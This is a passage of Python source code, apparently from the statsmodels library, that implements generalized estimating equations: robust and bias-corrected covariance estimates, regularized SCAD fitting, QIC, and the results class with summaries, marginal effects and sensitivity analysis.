else:
wresid = resid
wdmat = dmat
rslt = self.cov_struct.covariance_matrix_solve(
expval, i, sdev, (wdmat, wresid))
if rslt is None:
return None, None, None
vinv_d, vinv_resid = tuple(rslt)
bmat += np.dot(dmat.T, vinv_d)
dvinv_resid = np.dot(dmat.T, vinv_resid)
cmat += np.outer(dvinv_resid, dvinv_resid)
scale = self.estimate_scale()
try:
bmati = np.linalg.inv(bmat)
except np.linalg.LinAlgError:
bmati = np.linalg.pinv(bmat)
cov_naive = bmati * scale
cov_robust = np.dot(bmati, np.dot(cmat, bmati))
cov_naive *= self.scaling_factor
cov_robust *= self.scaling_factor
return cov_robust, cov_naive, cmat
# Calculate the bias-corrected sandwich estimate of Mancl and
# DeRouen.
def _bc_covmat(self, cov_naive):
cov_naive = cov_naive / self.scaling_factor
endog = self.endog_li
exog = self.exog_li
varfunc = self.family.variance
cached_means = self.cached_means
scale = self.estimate_scale()
bcm = 0
for i in range(self.num_group):
expval, lpr = cached_means[i]
resid = endog[i] - expval
dmat = self.mean_deriv(exog[i], lpr)
sdev = np.sqrt(varfunc(expval))
rslt = self.cov_struct.covariance_matrix_solve(
expval, i, sdev, (dmat,))
if rslt is None:
return None
vinv_d = rslt[0]
vinv_d /= scale
hmat = np.dot(vinv_d, cov_naive)
hmat = np.dot(hmat, dmat.T).T
f = self.weights_li[i] if self.weights is not None else 1.
aresid = np.linalg.solve(np.eye(len(resid)) - hmat, resid)
rslt = self.cov_struct.covariance_matrix_solve(
expval, i, sdev, (aresid,))
if rslt is None:
return None
srt = rslt[0]
srt = f * np.dot(dmat.T, srt) / scale
bcm += np.outer(srt, srt)
cov_robust_bc = np.dot(cov_naive, np.dot(bcm, cov_naive))
cov_robust_bc *= self.scaling_factor
return cov_robust_bc
def _starting_params(self):
if np.isscalar(self._offset_exposure):
offset = None
else:
offset = self._offset_exposure
model = GLM(self.endog, self.exog, family=self.family,
offset=offset, freq_weights=self.weights)
result = model.fit()
return result.params
@Appender(_gee_fit_doc)
def fit(self, maxiter=60, ctol=1e-6, start_params=None,
params_niter=1, first_dep_update=0,
cov_type='robust', ddof_scale=None, scaling_factor=1.,
scale=None):
self.scaletype = scale
# Subtract this number from the total sample size when
# normalizing the scale parameter estimate.
if ddof_scale is None:
self.ddof_scale = self.exog.shape[1]
else:
if not ddof_scale >= 0:
raise ValueError(
"ddof_scale must be a non-negative number or None")
self.ddof_scale = ddof_scale
self.scaling_factor = scaling_factor
self._fit_history = defaultdict(list)
if self.weights is not None and cov_type == 'naive':
raise ValueError("when using weights, cov_type may not be naive")
if start_params is None:
mean_params = self._starting_params()
else:
start_params = np.asarray(start_params)
mean_params = start_params.copy()
self.update_cached_means(mean_params)
del_params = -1.
num_assoc_updates = 0
for itr in range(maxiter):
update, score = self._update_mean_params()
if update is None:
warnings.warn("Singular matrix encountered in GEE update",
ConvergenceWarning)
break
mean_params += update
self.update_cached_means(mean_params)
# L2 norm of the change in mean structure parameters at
# this iteration.
del_params = np.sqrt(np.sum(score ** 2))
self._fit_history['params'].append(mean_params.copy())
self._fit_history['score'].append(score)
self._fit_history['dep_params'].append(
self.cov_struct.dep_params)
# Do not exit until the association parameters have been
# updated at least once.
if (del_params < ctol and
(num_assoc_updates > 0 or self.update_dep is False)):
break
# Update the dependence structure
if (self.update_dep and (itr % params_niter) == 0
and (itr >= first_dep_update)):
self._update_assoc(mean_params)
num_assoc_updates += 1
if del_params >= ctol:
warnings.warn("Iteration limit reached prior to convergence",
IterationLimitWarning)
if mean_params is None:
warnings.warn("Unable to estimate GEE parameters.",
ConvergenceWarning)
return None
bcov, ncov, _ = self._covmat()
if bcov is None:
warnings.warn("Estimated covariance structure for GEE "
"estimates is singular", ConvergenceWarning)
return None
bc_cov = None
if cov_type == "bias_reduced":
bc_cov = self._bc_covmat(ncov)
if self.constraint is not None:
x = mean_params.copy()
mean_params, bcov = self._handle_constraint(mean_params, bcov)
if mean_params is None:
warnings.warn("Unable to estimate constrained GEE "
"parameters.", ConvergenceWarning)
return None
y, ncov = self._handle_constraint(x, ncov)
if y is None:
warnings.warn("Unable to estimate constrained GEE "
"parameters.", ConvergenceWarning)
return None
if bc_cov is not None:
y, bc_cov = self._handle_constraint(x, bc_cov)
if x is None:
warnings.warn("Unable to estimate constrained GEE "
"parameters.", ConvergenceWarning)
return None
scale = self.estimate_scale()
# kwargs to add to results instance, need to be available in __init__
res_kwds = dict(cov_type=cov_type,
cov_robust=bcov,
cov_naive=ncov,
cov_robust_bc=bc_cov)
# The superclass constructor will multiply the covariance
# matrix argument bcov by scale, which we do not want, so we
# divide bcov by the scale parameter here
results = GEEResults(self, mean_params, bcov / scale, scale,
cov_type=cov_type, use_t=False,
attr_kwds=res_kwds)
# attributes not needed during results__init__
results.fit_history = self._fit_history
self.fit_history = defaultdict(list)
results.score_norm = del_params
results.converged = (del_params < ctol)
results.cov_struct = self.cov_struct
results.params_niter = params_niter
results.first_dep_update = first_dep_update
results.ctol = ctol
results.maxiter = maxiter
# These will be copied over to subclasses when upgrading.
results._props = ["cov_type", "use_t",
"cov_params_default", "cov_robust",
"cov_naive", "cov_robust_bc",
"fit_history",
"score_norm", "converged", "cov_struct",
"params_niter", "first_dep_update", "ctol",
"maxiter"]
return GEEResultsWrapper(results)
def _update_regularized(self, params, pen_wt, scad_param, eps):
sn, hm = 0, 0
for i in range(self.num_group):
expval, _ = self.cached_means[i]
resid = self.endog_li[i] - expval
sdev = np.sqrt(self.family.variance(expval))
ex = self.exog_li[i] * sdev[:, None]**2
rslt = self.cov_struct.covariance_matrix_solve(
expval, i, sdev, (resid, ex))
sn0 = rslt[0]
sn += np.dot(ex.T, sn0)
hm0 = rslt[1]
hm += np.dot(ex.T, hm0)
# Wang et al. divide sn here by num_group, but that
# seems to be incorrect
ap = np.abs(params)
clipped = np.clip(scad_param * pen_wt - ap, 0, np.inf)
en = pen_wt * clipped * (ap > pen_wt)
en /= (scad_param - 1) * pen_wt
en += pen_wt * (ap <= pen_wt)
en /= eps + ap
hm.flat[::hm.shape[0] + 1] += self.num_group * en
sn -= self.num_group * en * params
try:
update = np.linalg.solve(hm, sn)
except np.linalg.LinAlgError:
update = np.dot(np.linalg.pinv(hm), sn)
msg = "Encountered singularity in regularized GEE update"
warnings.warn(msg)
hm *= self.estimate_scale()
return update, hm
def _regularized_covmat(self, mean_params):
self.update_cached_means(mean_params)
ma = 0
for i in range(self.num_group):
expval, _ = self.cached_means[i]
resid = self.endog_li[i] - expval
sdev = np.sqrt(self.family.variance(expval))
ex = self.exog_li[i] * sdev[:, None]**2
rslt = self.cov_struct.covariance_matrix_solve(
expval, i, sdev, (resid,))
ma0 = np.dot(ex.T, rslt[0])
ma += np.outer(ma0, ma0)
return ma
def fit_regularized(self, pen_wt, scad_param=3.7, maxiter=100,
ddof_scale=None, update_assoc=5,
ctol=1e-5, ztol=1e-3, eps=1e-6, scale=None):
"""
Regularized estimation for GEE.
Parameters
----------
pen_wt : float
The penalty weight (a non-negative scalar).
scad_param : float
Non-negative scalar determining the shape of the Scad
penalty.
maxiter : int
The maximum number of iterations.
ddof_scale : int
Value to subtract from `nobs` when calculating the
denominator degrees of freedom for t-statistics, defaults
to the number of columns in `exog`.
update_assoc : int
The dependence parameters are updated every `update_assoc`
iterations of the mean structure parameter updates.
ctol : float
Convergence criterion, default is one order of magnitude
smaller than proposed in section 3.1 of Wang et al.
ztol : float
Coefficients smaller than this value are treated as
being zero, default is based on section 5 of Wang et al.
eps : non-negative scalar
Numerical constant, see section 3.2 of Wang et al.
scale : float or string
If a float, this value is used as the scale parameter.
If "X2", the scale parameter is always estimated using
Pearson's chi-square method (e.g. as in a quasi-Poisson
analysis). If None, the default approach for the family
is used to estimate the scale parameter.
Returns
-------
GEEResults instance. Note that not all methods of the results
class make sense when the model has been fit with regularization.
Notes
-----
This implementation assumes that the link is canonical.
References
----------
Wang L, Zhou J, Qu A. (2012). Penalized generalized estimating
equations for high-dimensional longitudinal data analysis.
Biometrics. 2012 Jun;68(2):353-60.
doi: 10.1111/j.1541-0420.2011.01678.x.
https://www.ncbi.nlm.nih.gov/pubmed/21955051
http://users.stat.umn.edu/~wangx346/research/GEE_selection.pdf
"""
self.scaletype = scale
mean_params = np.zeros(self.exog.shape[1])
self.update_cached_means(mean_params)
converged = False
fit_history = defaultdict(list)
# Subtract this number from the total sample size when
# normalizing the scale parameter estimate.
if ddof_scale is None:
self.ddof_scale = self.exog.shape[1]
else:
if not ddof_scale >= 0:
raise ValueError(
"ddof_scale must be a non-negative number or None")
self.ddof_scale = ddof_scale
# Keep this private for now. In some cases the early steps are
# very small so it seems necessary to ensure a certain minimum
# number of iterations before testing for convergence.
miniter = 20
for itr in range(maxiter):
update, hm = self._update_regularized(
mean_params, pen_wt, scad_param, eps)
if update is None:
msg = "Singular matrix encountered in regularized GEE update",
warnings.warn(msg, ConvergenceWarning)
break
if itr > miniter and np.sqrt(np.sum(update**2)) < ctol:
converged = True
break
mean_params += update
fit_history['params'].append(mean_params.copy())
self.update_cached_means(mean_params)
if itr != 0 and (itr % update_assoc == 0):
self._update_assoc(mean_params)
if not converged:
msg = "GEE.fit_regularized did not converge"
warnings.warn(msg)
mean_params[np.abs(mean_params) < ztol] = 0
self._update_assoc(mean_params)
ma = self._regularized_covmat(mean_params)
cov = np.linalg.solve(hm, ma)
cov = np.linalg.solve(hm, cov.T)
# kwargs to add to results instance, need to be available in __init__
res_kwds = dict(cov_type="robust", cov_robust=cov)
scale = self.estimate_scale()
rslt = GEEResults(self, mean_params, cov, scale,
regularized=True, attr_kwds=res_kwds)
rslt.fit_history = fit_history
return GEEResultsWrapper(rslt)
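# Illustrative sketch of SCAD-penalized estimation with ``fit_regularized``;
# the data are simulated and the penalty weight is arbitrary (in practice it
# would be chosen by cross-validation or a BIC-type criterion).
#
# >>> import numpy as np
# >>> import statsmodels.api as sm
# >>> rng = np.random.default_rng(1)
# >>> groups = np.repeat(np.arange(100), 5)
# >>> x = rng.normal(size=(500, 10))
# >>> y = x[:, 0] - x[:, 1] + rng.normal(size=500)
# >>> model = sm.GEE(y, x, groups)
# >>> result = model.fit_regularized(pen_wt=0.05)
# >>> print(result.params)  # coefficients with |value| < ztol are set to 0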
def _handle_constraint(self, mean_params, bcov):
"""
Expand the parameter estimate `mean_params` and covariance matrix
`bcov` to the coordinate system of the unconstrained model.
Parameters
----------
mean_params : array_like
A parameter vector estimate for the reduced model.
bcov : array_like
The covariance matrix of mean_params.
Returns
-------
mean_params : array_like
The input parameter vector mean_params, expanded to the
coordinate system of the full model
bcov : array_like
The input covariance matrix bcov, expanded to the
coordinate system of the full model
"""
# The number of variables in the full model
red_p = len(mean_params)
full_p = self.constraint.lhs.shape[1]
mean_params0 = np.r_[mean_params, np.zeros(full_p - red_p)]
# Get the score vector under the full model.
save_exog_li = self.exog_li
self.exog_li = self.constraint.exog_fulltrans_li
import copy
save_cached_means = copy.deepcopy(self.cached_means)
self.update_cached_means(mean_params0)
_, score = self._update_mean_params()
if score is None:
warnings.warn("Singular matrix encountered in GEE score test",
ConvergenceWarning)
return None, None
_, ncov1, cmat = self._covmat()
scale = self.estimate_scale()
cmat = cmat / scale ** 2
score2 = score[red_p:] / scale
amat = np.linalg.inv(ncov1)
bmat_11 = cmat[0:red_p, 0:red_p]
bmat_22 = cmat[red_p:, red_p:]
bmat_12 = cmat[0:red_p, red_p:]
amat_11 = amat[0:red_p, 0:red_p]
amat_12 = amat[0:red_p, red_p:]
score_cov = bmat_22 - np.dot(amat_12.T,
np.linalg.solve(amat_11, bmat_12))
score_cov -= np.dot(bmat_12.T,
np.linalg.solve(amat_11, amat_12))
score_cov += np.dot(amat_12.T,
np.dot(np.linalg.solve(amat_11, bmat_11),
np.linalg.solve(amat_11, amat_12)))
from scipy.stats.distributions import chi2
score_statistic = np.dot(score2,
np.linalg.solve(score_cov, score2))
score_df = len(score2)
score_pvalue = 1 - chi2.cdf(score_statistic, score_df)
self.score_test_results = {"statistic": score_statistic,
"df": score_df,
"p-value": score_pvalue}
mean_params = self.constraint.unpack_param(mean_params)
bcov = self.constraint.unpack_cov(bcov)
self.exog_li = save_exog_li
self.cached_means = save_cached_means
self.exog = self.constraint.restore_exog()
return mean_params, bcov
def _update_assoc(self, params):
"""
Update the association parameters
"""
self.cov_struct.update(params)
def _derivative_exog(self, params, exog=None, transform='dydx',
dummy_idx=None, count_idx=None):
"""
For computing marginal effects, returns dF(XB) / dX where F(.)
is the fitted mean.
transform can be 'dydx', 'dyex', 'eydx', or 'eyex'.
Not all of these make sense in the presence of discrete regressors,
but checks are done in the results in get_margeff.
"""
# This form should be appropriate for group 1 probit, logit,
# logistic, cloglog, heckprob, xtprobit.
offset_exposure = None
if exog is None:
exog = self.exog
offset_exposure = self._offset_exposure
margeff = self.mean_deriv_exog(exog, params, offset_exposure)
if 'ex' in transform:
margeff *= exog
if 'ey' in transform:
margeff /= self.predict(params, exog)[:, None]
if count_idx is not None:
from statsmodels.discrete.discrete_margins import (
_get_count_effects)
margeff = _get_count_effects(margeff, exog, count_idx, transform,
self, params)
if dummy_idx is not None:
from statsmodels.discrete.discrete_margins import (
_get_dummy_effects)
margeff = _get_dummy_effects(margeff, exog, dummy_idx, transform,
self, params)
return margeff
def qic(self, params, scale, cov_params):
"""
Returns quasi-information criteria and quasi-likelihood values.
Parameters
----------
params : array_like
The GEE estimates of the regression parameters.
scale : scalar
Estimated scale parameter
cov_params : array_like
An estimate of the covariance matrix for the
model parameters. Conventionally this is the robust
covariance matrix.
Returns
-------
ql : scalar
The quasi-likelihood value
qic : scalar
A QIC that can be used to compare the mean and covariance
structures of the model.
qicu : scalar
A simplified QIC that can be used to compare mean structures
but not covariance structures
Notes
-----
The quasi-likelihood used here is obtained by numerically evaluating
Wedderburn's integral representation of the quasi-likelihood function.
This approach is valid for all families and links. Many other
packages use analytical expressions for quasi-likelihoods that are
valid in special cases where the link function is canonical. These
analytical expressions may omit additive constants that only depend
on the data. Therefore, the numerical values of our QL and QIC values
will differ from the values reported by other packages. However only
the differences between two QIC values calculated for different models
using the same data are meaningful. Our QIC should produce the same
QIC differences as other software.
When using the QIC for models with unknown scale parameter, use a
common estimate of the scale parameter for all models being compared.
References
----------
.. [*] W. Pan (2001). Akaike's information criterion in generalized
estimating equations. Biometrics (57) 1.
"""
varfunc = self.family.variance
means = []
omega = 0.0
# omega^-1 is the model-based covariance assuming independence
for i in range(self.num_group):
expval, lpr = self.cached_means[i]
means.append(expval)
dmat = self.mean_deriv(self.exog_li[i], lpr)
omega += np.dot(dmat.T, dmat) / scale
means = np.concatenate(means)
# The quasi-likelihood, use change of variables so the integration is
# from -1 to 1.
endog_li = np.concatenate(self.endog_li)
du = means - endog_li
nstep = 10000
qv = np.empty(nstep)
xv = np.linspace(-0.99999, 1, nstep)
for i, g in enumerate(xv):
u = endog_li + (g + 1) * du / 2.0
vu = varfunc(u)
qv[i] = -np.sum(du**2 * (g + 1) / vu)
qv /= (4 * scale)
from scipy.integrate import trapz
ql = trapz(qv, dx=xv[1] - xv[0])
qicu = -2 * ql + 2 * self.exog.shape[1]
qic = -2 * ql + 2 * np.trace(np.dot(omega, cov_params))
return ql, qic, qicu
class GEEResults(GLMResults):
__doc__ = (
"This class summarizes the fit of a marginal regression model "
"using GEE.\n" + _gee_results_doc)
def __init__(self, model, params, cov_params, scale,
cov_type='robust', use_t=False, regularized=False,
**kwds):
super(GEEResults, self).__init__(
model, params, normalized_cov_params=cov_params,
scale=scale)
# not added by super
self.df_resid = model.df_resid
self.df_model = model.df_model
self.family = model.family
attr_kwds = kwds.pop('attr_kwds', {})
self.__dict__.update(attr_kwds)
# we do not do this if the cov_type has already been set
# subclasses can set it through attr_kwds
if not (hasattr(self, 'cov_type') and
hasattr(self, 'cov_params_default')):
self.cov_type = cov_type # keep alias
covariance_type = self.cov_type.lower()
allowed_covariances = ["robust", "naive", "bias_reduced"]
if covariance_type not in allowed_covariances:
msg = ("GEE: `cov_type` must be one of " +
", ".join(allowed_covariances))
raise ValueError(msg)
if cov_type == "robust":
cov = self.cov_robust
elif cov_type == "naive":
cov = self.cov_naive
elif cov_type == "bias_reduced":
cov = self.cov_robust_bc
self.cov_params_default = cov
else:
if self.cov_type != cov_type:
raise ValueError('cov_type in argument is different from '
'already attached cov_type')
@cache_readonly
def resid(self):
"""
The response residuals.
"""
return self.resid_response
def standard_errors(self, cov_type="robust"):
"""
This is a convenience function that returns the standard
errors for any covariance type. The value of `bse` is the
standard errors for whichever covariance type is specified as
an argument to `fit` (defaults to "robust").
Parameters
----------
cov_type : str
One of "robust", "naive", or "bias_reduced". Determines
the covariance used to compute standard errors. Defaults
to "robust".
"""
# Check covariance_type
covariance_type = cov_type.lower()
allowed_covariances = ["robust", "naive", "bias_reduced"]
if covariance_type not in allowed_covariances:
msg = ("GEE: `covariance_type` must be one of " +
", ".join(allowed_covariances))
raise ValueError(msg)
if covariance_type == "robust":
return np.sqrt(np.diag(self.cov_robust))
elif covariance_type == "naive":
return np.sqrt(np.diag(self.cov_naive))
elif covariance_type == "bias_reduced":
if self.cov_robust_bc is None:
raise ValueError(
"GEE: `bias_reduced` covariance not available")
return np.sqrt(np.diag(self.cov_robust_bc))
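# Illustrative sketch; ``result`` denotes a previously fitted GEEResults
# instance (hypothetical). The three covariance types can be compared
# without refitting, but "bias_reduced" standard errors are only available
# if the model was fit with cov_type="bias_reduced".
#
# >>> se_robust = result.standard_errors("robust")
# >>> se_naive = result.standard_errors("naive")
# >>> se_bc = result.standard_errors("bias_reduced")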
# Need to override to allow for different covariance types.
@cache_readonly
def bse(self):
return self.standard_errors(self.cov_type)
def score_test(self):
"""
Return the results of a score test for a linear constraint.
Returns
-------
A dictionary containing the p-value, the test statistic,
and the degrees of freedom for the score test.
Notes
-----
See also GEE.compare_score_test for an alternative way to perform
a score test. GEEResults.score_test is more general, in that it
supports testing arbitrary linear equality constraints. However
GEE.compare_score_test might be easier to use when comparing
two explicit models.
References
----------
Xu Guo and Wei Pan (2002). "Small sample performance of the score
test in GEE".
http://www.sph.umn.edu/faculty1/wp-content/uploads/2012/11/rr2002-013.pdf
"""
if not hasattr(self.model, "score_test_results"):
msg = "score_test on results instance only available when "
msg += " model was fit with constraints"
raise ValueError(msg)
return self.model.score_test_results
@cache_readonly
def resid_split(self):
"""
Returns the residuals, the endogeneous data minus the fitted
values from the model. The residuals are returned as a list
of arrays containing the residuals for each cluster.
"""
sresid = []
for v in self.model.group_labels:
ii = self.model.group_indices[v]
sresid.append(self.resid[ii])
return sresid
@cache_readonly
def resid_centered(self):
"""
Returns the residuals centered within each group.
"""
cresid = self.resid.copy()
for v in self.model.group_labels:
ii = self.model.group_indices[v]
cresid[ii] -= cresid[ii].mean()
return cresid
@cache_readonly
def resid_centered_split(self):
"""
Returns the residuals centered within each group. The
residuals are returned as a list of arrays containing the
centered residuals for each cluster.
"""
sresid = []
for v in self.model.group_labels:
ii = self.model.group_indices[v]
sresid.append(self.centered_resid[ii])
return sresid
def qic(self, scale=None):
"""
Returns the QIC and QICu information criteria.
For families with a scale parameter (e.g. Gaussian), provide
as the scale argument the estimated scale from the largest
model under consideration.
If the scale parameter is not provided, the estimated scale
parameter is used. Doing this does not allow comparisons of
QIC values between models.
"""
# It is easy to forget to set the scale parameter. Sometimes
# this is intentional, so we warn.
if scale is None:
warnings.warn("QIC values obtained using scale=None are not "
"appropriate for comparing models")
if scale is None:
scale = self.scale
_, qic, qicu = self.model.qic(self.params, scale,
self.cov_params())
return qic, qicu
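# Illustrative sketch of comparing working correlation structures by QIC;
# ``result_ind`` and ``result_ex`` are fits of the same mean structure
# under Independence and Exchangeable working covariance (hypothetical
# names). For families with a free scale parameter, pass a common scale so
# the QIC values are comparable; smaller QIC is preferred.
#
# >>> scale = result_ex.scale
# >>> qic_ind, qicu_ind = result_ind.qic(scale=scale)
# >>> qic_ex, qicu_ex = result_ex.qic(scale=scale)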
# FIXME: alias to be removed, temporary backwards compatibility
split_resid = resid_split
centered_resid = resid_centered
split_centered_resid = resid_centered_split
@Appender(_plot_added_variable_doc % {'extra_params_doc': ''})
def plot_added_variable(self, focus_exog, resid_type=None,
use_glm_weights=True, fit_kwargs=None,
ax=None):
from statsmodels.graphics.regressionplots import plot_added_variable
fig = plot_added_variable(self, focus_exog,
resid_type=resid_type,
use_glm_weights=use_glm_weights,
fit_kwargs=fit_kwargs, ax=ax)
return fig
@Appender(_plot_partial_residuals_doc % {'extra_params_doc': ''})
def plot_partial_residuals(self, focus_exog, ax=None):
from statsmodels.graphics.regressionplots import plot_partial_residuals
return plot_partial_residuals(self, focus_exog, ax=ax)
@Appender(_plot_ceres_residuals_doc % {'extra_params_doc': ''})
def plot_ceres_residuals(self, focus_exog, frac=0.66, cond_means=None,
ax=None):
from statsmodels.graphics.regressionplots import plot_ceres_residuals
return plot_ceres_residuals(self, focus_exog, frac,
cond_means=cond_means, ax=ax)
def conf_int(self, alpha=.05, cols=None, cov_type=None):
"""
Returns confidence intervals for the fitted parameters.
Parameters
----------
alpha : float, optional
The `alpha` level for the confidence interval. i.e., The
default `alpha` = .05 returns a 95% confidence interval.
cols : array_like, optional
`cols` specifies which confidence intervals to return
cov_type : str
The covariance type used for computing standard errors;
must be one of 'robust', 'naive', and 'bias reduced'.
See `GEE` for details.
Notes
-----
The confidence interval is based on the Gaussian distribution.
"""
# super does not allow to specify cov_type and method is not
# implemented,
# FIXME: remove this method here
if cov_type is None:
bse = self.bse
else:
bse = self.standard_errors(cov_type=cov_type)
params = self.params
dist = stats.norm
q = dist.ppf(1 - alpha / 2)
if cols is None:
lower = self.params - q * bse
upper = self.params + q * bse
else:
cols = np.asarray(cols)
lower = params[cols] - q * bse[cols]
upper = params[cols] + q * bse[cols]
return np.asarray(lzip(lower, upper))
def summary(self, yname=None, xname=None, title=None, alpha=.05):
"""
Summarize the GEE regression results
Parameters
----------
yname : str, optional
Default is `y`
xname : list[str], optional
Names for the exogenous variables; the default is `var_#`, where
# indexes the regressors. Must match the number of parameters
in the model.
title : str, optional
Title for the top table. If not None, then this replaces
the default title
alpha : float
significance level for the confidence intervals
cov_type : str
The covariance type used to compute the standard errors;
one of 'robust' (the usual robust sandwich-type covariance
estimate), 'naive' (ignores dependence), and 'bias
reduced' (the Mancl/DeRouen estimate).
Returns
-------
smry : Summary instance
this holds the summary tables and text, which can be
printed or converted to various output formats.
See Also
--------
statsmodels.iolib.summary.Summary : class to hold summary results
"""
top_left = [('Dep. Variable:', None),
('Model:', None),
('Method:', ['Generalized']),
('', ['Estimating Equations']),
('Family:', [self.model.family.__class__.__name__]),
('Dependence structure:',
[self.model.cov_struct.__class__.__name__]),
('Date:', None),
('Covariance type: ', [self.cov_type, ])
]
NY = [len(y) for y in self.model.endog_li]
top_right = [('No. Observations:', [sum(NY)]),
('No. clusters:', [len(self.model.endog_li)]),
('Min. cluster size:', [min(NY)]),
('Max. cluster size:', [max(NY)]),
('Mean cluster size:', ["%.1f" % np.mean(NY)]),
('Num. iterations:', ['%d' %
len(self.fit_history['params'])]),
('Scale:', ["%.3f" % self.scale]),
('Time:', None),
]
# The skew of the residuals
skew1 = stats.skew(self.resid)
kurt1 = stats.kurtosis(self.resid)
skew2 = stats.skew(self.centered_resid)
kurt2 = stats.kurtosis(self.centered_resid)
diagn_left = [('Skew:', ["%12.4f" % skew1]),
('Centered skew:', ["%12.4f" % skew2])]
diagn_right = [('Kurtosis:', ["%12.4f" % kurt1]),
('Centered kurtosis:', ["%12.4f" % kurt2])
]
if title is None:
title = self.model.__class__.__name__ + ' ' +\
"Regression Results"
# Override the exog variable names if xname is provided as an
# argument.
if xname is None:
xname = self.model.exog_names
if yname is None:
yname = self.model.endog_names
# Create summary table instance
from statsmodels.iolib.summary import Summary
smry = Summary()
smry.add_table_2cols(self, gleft=top_left, gright=top_right,
yname=yname, xname=xname,
title=title)
smry.add_table_params(self, yname=yname, xname=xname,
alpha=alpha, use_t=False)
smry.add_table_2cols(self, gleft=diagn_left,
gright=diagn_right, yname=yname,
xname=xname, title="")
return smry
def get_margeff(self, at='overall', method='dydx', atexog=None,
dummy=False, count=False):
"""Get marginal effects of the fitted model.
Parameters
----------
at : str, optional
Options are:
- 'overall', The average of the marginal effects at each
observation.
- 'mean', The marginal effects at the mean of each regressor.
- 'median', The marginal effects at the median of each regressor.
- 'zero', The marginal effects at zero for each regressor.
- 'all', The marginal effects at each observation. If `at` is 'all'
only margeff will be available.
Note that if `exog` is specified, then marginal effects for all
variables not specified by `exog` are calculated using the `at`
option.
method : str, optional
Options are:
- 'dydx' - dy/dx - No transformation is made and marginal effects
are returned. This is the default.
- 'eyex' - estimate elasticities of variables in `exog` --
d(lny)/d(lnx)
- 'dyex' - estimate semi-elasticity -- dy/d(lnx)
- 'eydx' - estimate semi-elasticity -- d(lny)/dx
Note that transformations are done after each observation is
calculated. Semi-elasticities for binary variables are computed
using the midpoint method. 'dyex' and 'eyex' do not make sense
for discrete variables.
atexog : array_like, optional
Optionally, you can provide the exogenous variables over which to
get the marginal effects. This should be a dictionary with the
zero-indexed column number as the key and the value at which to
hold that variable fixed as the dictionary value. Default is None
for all independent variables less the constant.
dummy : bool, optional
If False, treats binary variables (if present) as continuous. This
is the default. Else if True, treats binary variables as
changing from 0 to 1. Note that any variable that is either 0 or 1
is treated as binary. Each binary variable is treated separately
for now.
count : bool, optional
If False, treats count variables (if present) as continuous. This
is the default. Else if True, the marginal effect is the
change in probabilities when each observation is increased by one.
Returns
-------
effects : ndarray
the marginal effect corresponding to the input options
Notes
-----
When using after Poisson, returns the expected number of events
per period, assuming that the model is loglinear.
"""
if self.model.constraint is not None:
warnings.warn("marginal effects ignore constraints",
ValueWarning)
return GEEMargins(self, (at, method, atexog, dummy, count))
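# Illustrative sketch of marginal effects after a logistic GEE; ``result``
# denotes a fitted GEEResults instance with a Binomial family (hypothetical).
#
# >>> marg = result.get_margeff(at="overall", method="dydx")
# >>> print(marg.summary())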
def plot_isotropic_dependence(self, ax=None, xpoints=10,
min_n=50):
"""
Create a plot of the pairwise products of within-group
residuals against the corresponding time differences. This
plot can be used to assess the possible form of an isotropic
covariance structure.
Parameters
----------
ax : AxesSubplot
An axes on which to draw the graph. If None, new
figure and axes objects are created
xpoints : scalar or array_like
If scalar, the number of points equally spaced points on
the time difference axis used to define bins for
calculating local means. If an array, the specific points
that define the bins.
min_n : int
The minimum sample size in a bin for the mean residual
product to be included on the plot.
"""
from statsmodels.graphics import utils as gutils
resid = self.model.cluster_list(self.resid)
time = self.model.cluster_list(self.model.time)
# All within-group pairwise time distances (xdt) and the
# corresponding products of scaled residuals (xre).
xre, xdt = [], []
for re, ti in zip(resid, time):
ix = np.tril_indices(re.shape[0], 0)
re = re[ix[0]] * re[ix[1]] / self.scale ** 2
xre.append(re)
dists = np.sqrt(((ti[ix[0], :] - ti[ix[1], :]) ** 2).sum(1))
xdt.append(dists)
xre = np.concatenate(xre)
xdt = np.concatenate(xdt)
if ax is None:
fig, ax = gutils.create_mpl_ax(ax)
else:
fig = ax.get_figure()
# Convert to a correlation
ii = np.flatnonzero(xdt == 0)
v0 = np.mean(xre[ii])
xre /= v0
# Use the simple average to smooth, since fancier smoothers
# that trim and downweight outliers give biased results (we
# need the actual mean of a skewed distribution).
if np.isscalar(xpoints):
xpoints = np.linspace(0, max(xdt), xpoints)
dg = np.digitize(xdt, xpoints)
dgu = np.unique(dg)
hist = np.asarray([np.sum(dg == k) for k in dgu])
ii = np.flatnonzero(hist >= min_n)
dgu = dgu[ii]
dgy = np.asarray([np.mean(xre[dg == k]) for k in dgu])
dgx = np.asarray([np.mean(xdt[dg == k]) for k in dgu])
ax.plot(dgx, dgy, '-', color='orange', lw=5)
ax.set_xlabel("Time difference")
ax.set_ylabel("Product of scaled residuals")
return fig
def sensitivity_params(self, dep_params_first,
dep_params_last, num_steps):
"""
Refits the GEE model using a sequence of values for the
dependence parameters.
Parameters
----------
dep_params_first : array_like
The first dep_params in the sequence
dep_params_last : array_like
The last dep_params in the sequence
num_steps : int
The number of dep_params in the sequence
Returns
-------
results : array_like
The GEEResults objects resulting from the fits.
"""
model = self.model
import copy
cov_struct = copy.deepcopy(self.model.cov_struct)
# We are fixing the dependence structure in each run.
update_dep = model.update_dep
model.update_dep = False
dep_params = []
results = []
for x in np.linspace(0, 1, num_steps):
dp = x * dep_params_last + (1 - x) * dep_params_first
dep_params.append(dp)
model.cov_struct = copy.deepcopy(cov_struct)
model.cov_struct.dep_params = dp
rslt = model.fit(start_params=self.params,
ctol=self.ctol,
params_niter=self.params_niter,
first_dep_update=self.first_dep_update,
cov_type=self.cov_type)
results.append(rslt)
model.update_dep = update_dep
return results
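# Illustrative sketch of a sensitivity analysis over the working dependence
# parameter; ``result`` is a fitted GEEResults instance that used an
# Exchangeable structure (hypothetical). The parameter estimates can then
# be inspected across the grid of dependence parameters.
#
# >>> fits = result.sensitivity_params(0., 0.8, 5)
# >>> for r in fits:
# ...     print(r.cov_struct.dep_params, r.params)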
# FIXME: alias to be removed, temporary backwards compatibility
params_sensitivity = sensitivity_params
class GEEResultsWrapper(lm.RegressionResultsWrapper):
_attrs = {
'centered_resid': 'rows',
}
_wrap_attrs = wrap.union_dicts(lm.RegressionResultsWrapper._wrap_attrs,
_attrs)
wrap.populate_wrapper(GEEResultsWrapper, GEEResults) # noqa:E305
class OrdinalGEE(GEE):
__doc__ = (
" Ordinal Response Marginal Regression Model using GEE\n" +
_gee_init_doc % {'extra_params': base._missing_param_doc,
'family_doc': _gee_ordinal_family_doc,
'example': _gee_ordinal_example,
'notes': _gee_nointercept})
def __init__(self, endog, exog, groups, time=None, family=None,
cov_struct=None, missing='none', offset=None,
dep_data=None, constraint=None, **kwargs):
if family is None:
